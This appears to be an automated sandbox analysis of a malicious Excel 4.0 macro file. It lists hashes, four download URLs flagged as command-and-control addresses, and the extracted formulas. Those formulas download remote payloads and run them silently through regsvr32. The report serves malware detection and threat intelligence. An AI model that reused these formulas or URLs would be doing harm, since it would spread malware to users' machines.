General

  • Target

    Untitled 81764.xlsm

  • Size

    228KB

  • MD5

    0be38d7e3fe5fc3a79a597ed1d254a50

  • SHA1

    f4eb84f6b1297f57e57780aa7fcabe6438880d40

  • SHA256

    da644b867f32f4c76681fd2a7838d843f447f06f87a5ea98786031f0caf169cc

  • SHA512

    e589d28f3394e198fd8cebf453952973c6967922b171d4f997499d78dd297ee62567418ce621b84848aa1d9d7e4258bd12b287de198a456b70450775b94f81b2

  • SSDEEP

    6144:9w2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyO:9w2LDHf9PH5XUqRLTyO

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

httph.com/nutabalong/CfyFMHWntM3t/

https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/

http://bet-invest.com/mail/nui/

https://www.manchesterot.co.uk/about-us/KEfGo/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"httph.com/nutabalong/CfyFMHWntM3t/","..\oxnv1.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/","..\oxnv2.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bet-invest.com/mail/nui/","..\oxnv3.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/KEfGo/","..\oxnv4.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • Untitled 81764.xlsm
    .xlsm office2007